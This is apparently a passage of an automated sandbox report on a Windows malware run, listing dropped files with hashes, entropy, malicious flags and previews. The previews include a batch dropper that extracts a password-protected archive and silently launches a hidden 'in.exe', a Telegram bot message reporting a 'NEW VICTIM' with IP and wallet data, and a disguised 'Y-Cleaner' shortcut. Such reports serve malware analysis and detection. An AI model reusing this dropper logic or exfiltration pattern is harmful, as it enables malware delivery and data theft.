                                                                                                                                                                                                                                                              SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                                                                                                                              SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.
                                                                                                                                                                                                                                                              Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):3473725
                                                                                                                                                                                                                                                              Entropy (8bit):7.999948676888215
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                                                                                                                              SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                                                                                                                              SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                                                                                                                              SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe
                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):440
                                                                                                                                                                                                                                                              Entropy (8bit):5.0791308599041844
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:3626532127E3066DF98E34C3D56A1869
                                                                                                                                                                                                                                                              SHA1:5FA7102F02615AFDE4EFD4ED091744E842C63F78
                                                                                                                                                                                                                                                              SHA-256:2A0E18EF585DB0802269B8C1DDCCB95CE4C0BAC747E207EE6131DEE989788BCA
                                                                                                                                                                                                                                                              SHA-512:DCCE66D6E24D5A4A352874144871CD73C327E04C1B50764399457D8D70A9515F5BC0A650232763BF34D4830BAB70EE4539646E7625CFE5336A870E311043B2BD
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p24291711423417250691697322505 -oextracted ..for /l %%i in (7,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "in.exe" ../..cd....rd /s /q extracted..attrib +H "in.exe"..start "" "in.exe"..cls..echo Launched 'in.exe'...pause..del /f /q "in.exe"..
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):314617856
                                                                                                                                                                                                                                                              Entropy (8bit):0.0023405199003427007
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:72E6EB9DEED67E1BFCC07377DBC0019B
                                                                                                                                                                                                                                                              SHA1:2213A7F2630FDD791CA4686B6D6EE8B755B85C35
                                                                                                                                                                                                                                                              SHA-256:87D6859A2DE5B9D7D12D97669E71A1295611A51831D4929DC0A5AE6A630AB8F3
                                                                                                                                                                                                                                                              SHA-512:2E9D7BE2F3442A3E2BD6F04E7A9D49465A166E2844C9438FB152182630D7FCDDC90C6ECB21EC0065792E31AACD19997645E0A429F120428A71BABB4AB984941F
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....fg...............(.v........................@.......................... ............@... .................................................................d...........................D.......................T................................text....t.......v..................`..`.data...T............z..............@....rdata...............|..............@..@.eh_fram............................@..@.bss....t................................idata..............................@....CRT....0...........................@....tls................................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\in.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1827328
                                                                                                                                                                                                                                                              Entropy (8bit):7.963282633529333
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                                                              SHA1:D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
                                                                                                                                                                                                                                                              SHA-256:46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
                                                                                                                                                                                                                                                              SHA-512:044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe
                                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Sun Dec 22 00:19:00 2024, mtime=Sun Dec 22 00:19:00 2024, atime=Sun Dec 22 00:19:00 2024, length=1502720, window=hide
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):2233
                                                                                                                                                                                                                                                              Entropy (8bit):3.9088124423663557
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:F8260FD68F3E86BF40E6AC6388F1F479
                                                                                                                                                                                                                                                              SHA1:202A521AED2C623AF0090C8CF61BD20B91531FCA
                                                                                                                                                                                                                                                              SHA-256:0598E27E60C98D2932275541EE8349243357469A50193E52BA8A35ADA80218D9
                                                                                                                                                                                                                                                              SHA-512:36CA25CE322BC704F8B602F27CD2D97B86D9AD72699D6C83EEB7F20E568CB35DB8123D68BBFF6883AD393EA4DB50C9F7BCF96724C609746919EDDEBB6B95508E
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:L..................F.@.. .....${.T....${.T....${.T..........................F.:..DG..Yr?.D..U..k0.&...&......vk.v....O...T...#F{.T......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y/...Local.<......CW.^.Y0.....b.....................2wc.L.o.c.a.l.....N.1......Y`...Temp..:......CW.^.Y`.....l......................(.T.e.m.p.......1......YZ...YVDVBF~1..j......YZ..YZ.....D.........................Y.V.D.V.B.f.F.G.R.3.e.A.e.B.e.w.w.D.9.v.e.w.W.w.V.e.0.B.....h.2......Ya. .Y-CLEA~1.EXE..L......Ya..Ya...........................!...Y.-.C.l.e.a.n.e.r...e.x.e.......{...............-.......z...........j.}......C:\Users\user\AppData\Local\Temp\YVDVBfFGR3eAeBewwD9vewWwVe0B\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.@.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.Y.V.D.V.B.f.F.G.R.3.e.A.e.B.e.w.w.D.9.v.e.w.W.w.V.e.0.B.\.Y.-.C.l.e.a.n.e.r...e.x.e.L.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):3263488
                                                                                                                                                                                                                                                              Entropy (8bit):6.675956678732107
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:CF6393E173FB6315D0C681BC78EB3528
                                                                                                                                                                                                                                                              SHA1:26DC307AE4EA1866D40C9A34E38768733EC30B34
                                                                                                                                                                                                                                                              SHA-256:3DEE7134CBEEA75160519A338FC848A18AF80C46EF475FCD3C69A463D449C35D
                                                                                                                                                                                                                                                              SHA-512:47E722C9F4736FAF9612AFF748CB4E1211E00FFE0FE56A65DC0DBEC07F7B5E81908269D7C31066250866F3459727874D88C27FA88BE08E540D0EB1E048CED61F
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................2.......1...@.................................W...k.............................1.............................D.1..................................................... . ............................@....rsrc...............................@....idata ............................@...dblbhqnk..+.......+.................@...rrjzixml......1.......1.............@....taggant.0....1.."....1.............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):321
                                                                                                                                                                                                                                                              Entropy (8bit):4.99323851364312
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:7225D8C283F7B303692A163301880199
                                                                                                                                                                                                                                                              SHA1:7BF7F829E108693DB3DAD66B557EAA1DBA464D94
                                                                                                                                                                                                                                                              SHA-256:19B824BE603626AAD3EB7CAAA5F56F709F22AE80965559A81977DEC9CB22A944
                                                                                                                                                                                                                                                              SHA-512:05125D14C265EED21453D2A6E8007F3BF2C2F339567718AF4F4A20C8EB1474EA73A7656B4EDF13B937B25AB3045601F49D19F8E47521C601FD17D3A218BE0D60
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:{. "ip": "8.46.123.189",. "hostname": "static-cpe-8-46-123-189.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
                                                                                                                                                                                                                                                              File Type:PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):156917
                                                                                                                                                                                                                                                              Entropy (8bit):7.994509354006501
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:F89267B24ECF471C16ADD613CEC34473
                                                                                                                                                                                                                                                              SHA1:C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
                                                                                                                                                                                                                                                              SHA-256:21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
                                                                                                                                                                                                                                                              SHA-512:C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, Author: ditekSHen
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:.PNG........IHDR................p....IDATx....|.e....3......D dw6...S..Y.[......#*L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.*....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):777
                                                                                                                                                                                                                                                              Entropy (8bit):5.1108586882706355
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:8943CD56009BABA4C7FAFD1ECBBEDB36
                                                                                                                                                                                                                                                              SHA1:9084C723DE33A2A401041B2A22C8C83DFAA916CA
                                                                                                                                                                                                                                                              SHA-256:5FEA1240ADC32CE2DEFEB338EDBD439B5D73D14E039669BB166A0C669DA11A97
                                                                                                                                                                                                                                                              SHA-512:27C9DC91391D8779A541A293368FBEB26BBF34ACBFB2171CFAF3D486A29496FD49DE6C5FF0445C39528FBB927AB36078E8F043E369E909920399DD7534C41BD8
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:{"ok":true,"result":{"message_id":30112,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1734830224,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 8.46.123.189\nDevice Name: 715575\nLocation: New York City, New York, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":12,"type":"url"},{"offset":61,"length":12,"type":"bold"},{"offset":81,"length":9,"type":"bold"},{"offset":119,"length":8,"type":"bold"},{"offset":128,"length":13,"type":"code"}]}}
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):284
                                                                                                                                                                                                                                                              Entropy (8bit):3.4267697404503656
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:5591C67FFF38B3655EA8C899CCDD16D9
                                                                                                                                                                                                                                                              SHA1:1820F091660C80DBFBAF10F83CD9A8C1C4324719
                                                                                                                                                                                                                                                              SHA-256:0594C3266077DF7DF3C5EC7A85EB3315143DCFB596441FDD9A05E68E1015FAAA
                                                                                                                                                                                                                                                              SHA-512:22BDA38A4CEA311FDEE7C78CE1593F6C5087FC2E1E7FD1D5971EDF88FC9D11B4EA6E4D050D12E055761728428E784A9FE765C16206D4126320E179A068D9C0F4
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:....D.R..u.G....,..fF.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.e.4.5.8.d.2.6.3.c.0.\.G.x.t.u.u.m...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):284
                                                                                                                                                                                                                                                              Entropy (8bit):3.4079493954928073
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:B0AECD975DAE8390839435D55E5462F6
                                                                                                                                                                                                                                                              SHA1:8D90409099FDF01DD97E85B47BD54633235A137F
                                                                                                                                                                                                                                                              SHA-256:1FDF3A8A39523924A41D71E7212EBA43440E59BAF11A80CF1790C4A4C70DD1C1
                                                                                                                                                                                                                                                              SHA-512:58D6B8185119687DD0238C7A5EE9C867B00C97A61D95AE7434D1959BA9026CCE8A7E900F764605F8AA21C7DF703F09D7EAFAC8761D0832D6439312BC1FA80498
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:.....Zo_.=.D...r.%..F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3415)
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):3420
                                                                                                                                                                                                                                                              Entropy (8bit):5.843287110148945
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:B30FF78546B2CA5DB5C65E5D6EF82C61
                                                                                                                                                                                                                                                              SHA1:A167CF7A1ABE38A2F39D74770DF928A0400FF8C2
                                                                                                                                                                                                                                                              SHA-256:95A2D5C3CD95465B04DC48FC6B07CE3E69F4872357CB22EEA51656E0CEC7373D
                                                                                                                                                                                                                                                              SHA-512:6DAD2D7D40B6009670FA3B7BF4768A9B025783FD0AFC7E0787E204D33A6570FBE911AFE42315D9A99446C909415BAF00236A6563B856F2853841E33765398E5B
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:)]}'.["",["ps5 pro","roh wrestling final battle","commercial tea bags microplastics","dogecoin price prediction","anthony rizzo","the eddie aikau big wave invitational","ursids meteor shower","apple iphone 17 pro max"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CgovbS8wZ2ZmNXZqEh9BbWVyaWNhbiBiYXNlYmFsbCBmaXJzdCBiYXNlbWFuMocOZGF0YTppbWFnZS9qcGVnO2Jhc2U2NCwvOWovNEFBUVNrWkpSZ0FCQVFBQUFRQUJBQUQvMndDRUFBa0dCd2dIQmdrSUJ3Z0tDZ2tMRFJZUERRd01EUnNVRlJBV0lCMGlJaUFkSHg4a0tEUXNKQ1l4Sng4ZkxUMHRNVFUzT2pvNkl5cy9SRDg0UXpRNU9qY0JDZ29LRFF3TkdnOFBHamNsSHlVM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOLy9BQUJFSUFFQUFRQU1CSWdBQ0VRRURFUUgveEFBYUFBQURBUUVCQVFBQUFBQUFBQUFBQUFBRkJnY0VBZ01BLzhRQU5SQUFBZ0VEQXdFRkJRWUhBUUFBQUFBQUFRSURBQVFSQlJJaE1RWVRRVkdSSWpKaGdhRVVVbkd4d2VFVkpVS1N
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1395)
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):117446
                                                                                                                                                                                                                                                              Entropy (8bit):5.490775275046353
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:942EA4F96889BAE7D3C59C0724AB2208
                                                                                                                                                                                                                                                              SHA1:033DDF473319500621D8EBB6961C4278E27222A7
                                                                                                                                                                                                                                                              SHA-256:F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
                                                                                                                                                                                                                                                              SHA-512:C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):29
                                                                                                                                                                                                                                                              Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                              SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                              SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                              SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):132769
                                                                                                                                                                                                                                                              Entropy (8bit):5.436983389096339
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:FF51342AA86E096E93A550F5C14AE095
                                                                                                                                                                                                                                                              SHA1:0179FACA8AF0A20A34EB905772D52B30D5959BD7
                                                                                                                                                                                                                                                              SHA-256:92C2041D8C1072BCC1D22D94B3C4630EFBFD264A379FCCEA7461C06E1D706B8B
                                                                                                                                                                                                                                                              SHA-512:08CB1D0E7B97EA9ACCBC77FB7CBFBD44EB93B99D7D6DCB2F2A99B4FABDA493997B659B04558EAB95F37BC12376A323B086DD40CBD5C73218B2706AE915735C4E
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:unknown
